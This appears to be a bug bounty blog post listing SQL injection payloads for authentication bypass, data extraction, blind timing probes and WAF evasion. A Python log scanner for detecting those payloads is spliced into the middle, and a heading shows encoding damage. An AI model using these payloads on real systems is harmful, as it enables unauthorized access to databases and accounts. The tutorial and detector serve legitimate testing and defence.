Wednesday, August 6, 2025

💥 SQL Injection Payloads for Bug Bounty Hunting: A Hands-On Guide

SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.


🚨 Legal Disclaimer

This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.


🧠 What is SQL Injection?

SQL Injection occurs when an attacker is able to inject arbitrary SQL code into a backend database query. This can lead to unauthorized data access, bypassing authentication, or even full system compromise.


🔎 Where to Look for SQLi?

SQLi opportunities can be found in:

  • Login forms

  • Search bars

  • Product filters

  • URL parameters

  • HTTP headers (e.g., User-Agent, Referer)

  • Cookies and hidden fields


🧪 Basic SQLi Payloads

These payloads test for simple injection points.

' OR '1'='1
' OR 1=1 --
admin' --
' OR '1'='1' --

Use these on login forms to attempt bypasses. If the app doesn’t sanitize input, you might gain unauthorized access.


🧨 Error-Based SQLi

Use these when the server returns SQL-related error messages.

' AND 1=CAST((SELECT user()) AS INT)--
' AND (SELECT COUNT(*) FROM users) > 0--

Look for verbose error messages like:

You have an error in your SQL syntax...


🧮 UNION-Based SQLi

This technique attempts to merge malicious queries with legitimate ones using UNION SELECT.

' UNION SELECT null, user() --
' UNION SELECT null, database(), version() --

Use ORDER BY to find the number of columns:

' ORDER BY 1--
' ORDER BY 2--

🕵️ Blind SQLi (Boolean-Based)

Ideal when the application behaves differently based on true/false conditions, even without visible errors.

' AND 1=1 --
' AND 1=2 --
' AND SUBSTRING(@@version,1,1)='5' --

Watch for changes in response length or content.


⏳ Time-Based Blind SQLi

Detectable via delayed responses using SLEEP() or WAITFOR DELAY.

' OR IF(1=1, SLEEP(5), 0)--
'; WAITFOR DELAY '0:0:5'--  -- (SQL Server)

Useful when no output is returned: the response delay alone reveals whether the injected condition was evaluated.


🗃️ Targeting Specific Databases

MySQL

' UNION SELECT user(), database() --

PostgreSQL

' UNION SELECT current_user, version() --

SQL Server

' UNION SELECT system_user, @@version --

Oracle

' UNION SELECT banner FROM v$version --


🧱 Bypassing WAFs

Use encoding, case changes, or SQL comments:

%27%20OR%201=1--
' oR '1'='1
'/*!UNION*/ SELECT NULL,NULL--
%27UnIoN%20SeLeCt%20null,null--

WAFs may block obvious patterns, but these tricks can sneak past.
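The flip side of the time-based and WAF-bypass sections is how a defender spots these requests in logs. The following is an added example, not code from the original post: a small Python log scanner that first undoes the evasions listed above (repeated URL-decoding for `%27`-style and double encoding, lowercasing for `UnIoN SeLeCt`, unwrapping MySQL `/*!...*/` versioned comments) and only then matches indicator patterns derived from the payload families on this page. It also uses the response time the way the time-based section describes: a `SLEEP()` or `WAITFOR DELAY` payload whose request took about as long as the requested delay is rated high, because the injected SQL evidently executed rather than merely arrived. The log line format, the sample log lines and the 4-second threshold are constructed assumptions for the demo; a real deployment would parse its own server's access-log format and also inspect headers and cookies, which this format does not carry.

```python
import re
from urllib.parse import unquote_plus

# Constructed log format (an assumption for this example, not the post's):
#   <client_ip> "<METHOD> <path?query>" <status> <bytes> <response_ms>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" '
    r"(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$"
)

# Indicator patterns derived from the payload families listed in the post.
INDICATORS = {
    "tautology":     re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+"),
    "quote_comment": re.compile(r"'\s*--"),
    "union_select":  re.compile(r"\bunion\b.*?\bselect\b"),
    "column_probe":  re.compile(r"\border by \d+"),
    "boolean_probe": re.compile(r"'\s*and\s*\d+\s*=\s*\d+"),
    "version_probe": re.compile(r"@@version|\b(?:version|user|database)\s*\("),
    "time_based":    re.compile(r"\bsleep\s*\(|\bwaitfor\s+delay\b"),
}


def normalize(raw: str) -> str:
    """Undo the evasions from the WAF-bypass section before matching:
    URL-decode until stable (catches double encoding), lowercase (catches
    mixed-case keywords), unwrap /*!...*/ versioned comments, drop ordinary
    /*...*/ comments, and collapse whitespace."""
    text = raw
    for _ in range(3):                      # bounded: decode until nothing changes
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = text.lower()
    text = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", text)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).strip()


def analyze_log(lines, slow_ms: int = 4000):
    """Return one finding per log line whose normalized query string matches
    at least one indicator. Lines that do not fit the format are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        norm = normalize(query)
        hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
        if not hits:
            continue
        ms = int(m["ms"])
        # A sleep/waitfor payload plus a matching delay means the injected SQL
        # actually executed, which is the strongest signal this scanner has.
        executed_delay = "time_based" in hits and ms >= slow_ms
        findings.append({
            "ip": m["ip"], "path": path, "status": int(m["status"]),
            "response_ms": ms, "indicators": hits,
            "severity": "high" if executed_delay else "medium",
            "normalized_query": norm,
        })
    return findings


# Constructed sample log lines built from the payload shapes shown in the post.
SAMPLE_LOG = [
    '203.0.113.5 "GET /search?q=shoes" 200 5120 35',
    '203.0.113.7 "GET /search?q=%27%20OR%201=1--" 200 9000 40',
    '203.0.113.7 "GET /item?id=1%27UnIoN%20SeLeCt%20null,null--" 500 300 22',
    '203.0.113.7 "GET /item?id=1%27/*!UNION*/%20SELECT%20NULL,NULL--" 200 8000 30',
    '203.0.113.9 "GET /item?id=1%27%20OR%20IF(1=1,%20SLEEP(5),%200)--" 200 8000 5012',
    '203.0.113.9 "GET /item?id=1%27%20AND%20SUBSTRING(@@version,1,1)=%275%27%20--" 200 7990 31',
    "garbage line that does not match the format",
]

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["ip"], finding["path"],
              finding["indicators"], f"{finding['response_ms']} ms")
```

Matching on the normalized text rather than the raw query is the design point: the same `union_select` rule catches both `UnIoN SeLeCt` and `/*!UNION*/ SELECT`, and a double-encoded `%2527` decodes to the same quote as `%27`. Response-time correlation is what separates a probe that was merely sent from one that the database executed.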


🛠️ Tools of the Trade

  • sqlmap — Automated SQLi testing tool

  • Burp Suite — With plugins like SQLiPy or Intruder for manual fuzzing

  • NoSQLMap — For MongoDB and other NoSQL targets

  • HackTricks SQLi Cheatsheet — Excellent reference


🎯 Pro Tips for Bounty Hunters

  • 📋 Log all payloads: Always keep a record of what you tested and how.

  • 🔍 Try every input vector: Don’t just test URLs — check headers and cookies too.

  • 🔍 Understand the app logic: Knowing how queries are structured helps tailor your payloads.

  • 🚫 Respect the scope: Always stay within allowed domains/endpoints.


๐Ÿ Final Thoughts

SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.

Want to sharpen your skills? Try labs like:

  • PortSwigger Web Security Academy

  • Hack The Box

  • TryHackMe

Happy hunting, and stay ethical!


🔗 Follow Me for More

💬 Got a favorite payload or tool? Share it in the comments!

📧 Subscribe for more bug bounty techniques and real-world examples.
